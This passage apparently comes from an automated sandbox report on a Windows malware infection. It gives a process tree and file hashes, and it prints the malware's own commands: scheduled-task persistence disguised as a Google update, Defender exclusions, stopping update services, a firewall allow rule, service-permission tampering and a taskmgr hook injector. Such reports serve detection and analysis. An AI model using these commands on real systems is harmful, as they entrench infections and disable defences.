- Suspicious use of AdjustPrivilegeToken
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"2⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4432
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"5⤵PID:1108
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E5⤵PID:4888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3232
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"5⤵PID:1920
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E5⤵PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 6205⤵
- Program crash
PID:1580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 8805⤵
- Program crash
PID:4584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 8885⤵
- Program crash
PID:2580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 9725⤵
- Program crash
PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 9805⤵
- Program crash
PID:1664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 11125⤵
- Program crash
PID:3920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 11405⤵
- Program crash
PID:3992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 14565⤵
- Program crash
PID:2124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit5⤵PID:4128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f6⤵
- Kills process with taskkill
PID:2680
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 14085⤵
- Program crash
PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:2072
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1284
-
-
[depth 4] C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
  - Executes dropped EXE
  PID:2200
[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  - Suspicious use of AdjustPrivilegeToken
  PID:1388
[depth 5] C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  PID:2140
[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3552
[depth 6] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
  PID:3984
[depth 7] C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
  - Modifies Windows Firewall
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3496
[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  PID:5104
[depth 6] C:\Windows\rss\csrss.exe
  Command line: C:\Windows\rss\csrss.exe
  - Executes dropped EXE
  PID:2524
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3556
[depth 7] C:\Windows\SYSTEM32\schtasks.exe
  Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
  - Creates scheduled task(s)
  PID:3224
[depth 7] C:\Windows\SYSTEM32\schtasks.exe
  Command line: schtasks /delete /tn ScheduledUpdate /f
  PID:3040
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4568
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -nologo -noprofile
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3276
[depth 7] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
  - Executes dropped EXE
  PID:3816
[depth 7] C:\Windows\SYSTEM32\schtasks.exe
  Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
  - Executes dropped EXE
  - Creates scheduled task(s)
  PID:1104
[depth 7] C:\Windows\windefender.exe
  Command line: "C:\Windows\windefender.exe"
  PID:4416
[depth 8] C:\Windows\SysWOW64\cmd.exe
  Command line: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
  PID:3964
[depth 9] C:\Windows\SysWOW64\sc.exe
  Command line: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
  - Launches sc.exe
  PID:1388
[depth 4] C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4768
[depth 5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  PID:1672
[depth 5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  - Suspicious use of AdjustPrivilegeToken
  PID:2768
[depth 4] C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1496
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  PID:4508
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  PID:4532
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop UsoSvc
  - Launches sc.exe
  PID:3848
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID:1672
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop wuauserv
  - Launches sc.exe
  PID:4348
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop bits
  - Launches sc.exe
  PID:4268
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop dosvc
  - Launches sc.exe
  PID:868
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  PID:3032
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
  PID:4496
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
  PID:448
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  - Suspicious use of AdjustPrivilegeToken
  PID:1124
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  PID:4220
[depth 2] C:\Windows\System32\schtasks.exe
  Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  PID:2144
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  PID:1492
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop UsoSvc
  - Launches sc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID:3256
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop wuauserv
  - Launches sc.exe
  PID:1908
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop bits
  - Launches sc.exe
  PID:2652
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop dosvc
  - Launches sc.exe
  PID:3568
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  PID:4076
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-ac 0
  PID:4056
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-dc 0
  PID:1980
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-ac 0
  PID:4188
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-dc 0
  PID:1944
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  PID:3056
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  PID:868
[depth 2] C:\Windows\System32\schtasks.exe
  Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  PID:2684
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  PID:3948
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop UsoSvc
  - Launches sc.exe
  PID:4100
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID:3516
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop wuauserv
  - Launches sc.exe
  PID:3492
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop bits
  - Launches sc.exe
  PID:2216
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop dosvc
  - Launches sc.exe
  PID:4828
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  PID:4756
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-ac 0
  PID:4940
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-dc 0
  PID:4452
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-ac 0
  PID:2176
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-dc 0
  PID:4904
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  PID:992
[depth 2] C:\Windows\System32\schtasks.exe
  Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5104
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  PID:2940
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop UsoSvc
  - Launches sc.exe
  PID:1564
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID:3376
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop wuauserv
  - Launches sc.exe
  PID:1856
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop bits
  - Launches sc.exe
  PID:2032
[depth 3] C:\Windows\System32\sc.exe
  Command line: sc stop dosvc
  - Launches sc.exe
  PID:3004
[depth 2] C:\Windows\System32\cmd.exe
  Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  PID:4912
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-ac 0
  PID:812
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-dc 0
  PID:2600
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-ac 0
  PID:3292
[depth 3] C:\Windows\System32\powercfg.exe
  Command line: powercfg /x -standby-timeout-dc 0
  PID:396
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  PID:4764
[depth 2] C:\Windows\System32\conhost.exe
  Command line: C:\Windows\System32\conhost.exe
  PID:2580
[depth 2] C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
  PID:3868
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2772 -ip 2772
  PID:1716
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2772 -ip 2772
  PID:60
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772
  PID:2528
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772
  PID:2348
[depth 1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  - Executes dropped EXE
  PID:220
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2772 -ip 2772
  PID:3492
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2772 -ip 2772
  PID:3848
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772
  PID:5096
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772
  PID:4556
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2772 -ip 2772
  PID:4132
[depth 1] C:\Program Files\Google\Chrome\updater.exe
  Command line: "C:\Program Files\Google\Chrome\updater.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  PID:5092
[depth 1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  PID:1104
[depth 1] C:\Windows\windefender.exe
  Command line: C:\Windows\windefender.exe
  PID:1772
[depth 1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  PID:1900
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 10.3MB (2 identical entries)
  MD5: ebf830587e4df50f0a886fe4bf05bda0
  SHA1: 3c0217098ca7b191d146b770eb366a9081187a66
  SHA256: e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
  SHA512: a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
- Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- Filesize: 2KB
  MD5: 67345b374ece01694478cd821081caf8
  SHA1: 04b3bacfe792cfaffb935ecd2b80813b3306b67b
  SHA256: 5a4a3f6ae9d338ce1639c47779eca19a0e827445e529d6fcf7753e670bf8b4f1
  SHA512: fe0c99e9731d3601e701e2bb7c8e542654447822a61c251e0124a1b9643f6264600f45ca8010c6150c9cef6903321f3769fa77008334f7a3c92e0026f83d6853
- Filesize: 522B
  MD5: 8334a471a4b492ece225b471b8ad2fc8
  SHA1: 1cb24640f32d23e8f7800bd0511b7b9c3011d992
  SHA256: 5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169
  SHA512: 56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36
- Filesize: 944B
  MD5: cadef9abd087803c630df65264a6c81c
  SHA1: babbf3636c347c8727c35f3eef2ee643dbcc4bd2
  SHA256: cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
  SHA512: 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
- Filesize: 944B (2 identical entries)
  MD5: 9bc110200117a3752313ca2acaf8a9e1
  SHA1: fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
  SHA256: c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
  SHA512: 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb
- Filesize: 1KB
  MD5: 9c260eec9480ce84b15f1f374765472f
  SHA1: 878893212a4afba68936571299d72d3f368947c4
  SHA256: 8156da2387bc5c58ca7c32cca44c6d2dbe61fb2a7ea73be6f0673c270521296c
  SHA512: a8334295234a90fb816633c0f01ccfaaaa70c64f52be466ff3c9086d2642f40ae7f71e229125c6a61de1c632c844b8c822dd956bc84967cee8dd1bdc672c5db2
- Filesize: 944B
  MD5: 2e907f77659a6601fcc408274894da2e
  SHA1: 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
  SHA256: 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
  SHA512: 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
- Filesize: 726KB (5 identical entries)
  MD5: 8670305fdaf49dc2fd18804bc8000bd2
  SHA1: a1b57601e426f1c12a25251012c7ef2f3d1181e2
  SHA256: f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
  SHA512: 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
- Filesize: 10.3MB (5 identical entries)
  MD5: ebf830587e4df50f0a886fe4bf05bda0
  SHA1: 3c0217098ca7b191d146b770eb366a9081187a66
  SHA256: e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
  SHA512: a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
- Filesize: 362KB (3 identical entries)
  MD5: 2d257873ee0ae75c9b89bd340e3e3da6
  SHA1: 9dd9080df32b375f39df6470136a5bb107829eba
  SHA256: f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
  SHA512: e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753
- Filesize: 293KB (4 identical entries)
